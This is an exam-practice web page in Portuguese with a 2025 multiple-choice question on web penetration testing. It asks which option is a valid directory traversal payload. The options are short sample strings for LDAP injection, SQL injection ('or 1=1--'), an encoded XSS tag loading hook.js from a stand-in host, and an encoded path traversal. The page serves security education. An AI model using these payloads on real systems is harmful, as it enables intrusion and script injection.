Início/Questões/Segurança da Informação e Criptografia/Questão 457941200304331Durante a realização de testes de invasão em uma aplicação Web, um analista encontrou um vetor de ataque para uma traves...1457941200304331Ano: 2025Banca: FCPCOrganização: UFCDisciplina: Segurança da Informação e CriptografiaTemas: Ciberataques e AmeaçasDurante a realização de testes de invasão em uma aplicação Web, um analista encontrou um vetor de ataque para uma travessia de diretórios. Marque a alternativa que possui um payload válido para este ataque.A(&(username=p0wn3d)(password=Pa$$w0rd))BSELECT * FROM tbl_user WHERE username = '' or 1=1--#Cblablabla%3Cscript%20src%3D%22https%3A%2F%2Fsites3gur0.foo%2Fhook.js%22%3E%3C% 2Fscript%3ED%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/hostsResponderQuestões relacionadas para praticarQuestão 457941200288455Segurança da Informação e CriptografiaFerramentas como OpenVAS e Nessus auxiliam os analistas no processo de identificação, classificação e monitoramento de vulnerabilidades em ativos orga...Questão 457941200341248Segurança da Informação e CriptografiaEttercap é uma ferramenta para análise de redes e hospedeiros que permite o sniffing de conexões ativas, a filtragem de conteúdo em tempo real, a diss...Questão 457941200477730Segurança da Informação e CriptografiaSão considerados algoritmos utilizados em criptografia assimétrica:Questão 457941200821567Segurança da Informação e CriptografiaEm busca de alcançar uma postura de segurança bem-sucedida, as organizações devem realizar, periodicamente, testes de segurança em seus ativos. Sejam ...Questão 457941200877720Segurança da Informação e Criptografia“Um incidente de segurança em computadores pode ser definido como uma atividade nas máquinas ou na rede que possa ameaçar a segurança dos sistemas com...Questão 457941201086434Segurança da Informação e CriptografiaSobre criptografia simétrica, assimétrica e assinaturas digitais, analise as seguintes informações. I. Assinaturas digitais são ideais para cifrar um ...Questão 457941201170747Segurança da Informação e CriptografiaApós sofrer uma série de ataques cibernéticos no último ano, uma empresa do setor educacional contratou uma auditoria de segurança da informação. Dent...Questão 457941201499298Segurança da Informação e CriptografiaSobre ferramentas de segurança de tecnologia da informação, analise as declarações abaixo. I.NAT provê uma segurança por obscuridade, uma vez que impe...Questão 457941201549147Segurança da Informação e CriptografiaQual das seguintes opções é um exemplo de algoritmo de criptografia assimétrica?Questão 457941201572898Segurança da Informação e CriptografiaDescendo para a terceira posição do OWASP Top Ten:2021, a categoria de Injeção inclui Enumerações de Fraquezas Comuns (Common Weaknesses Enumeration -...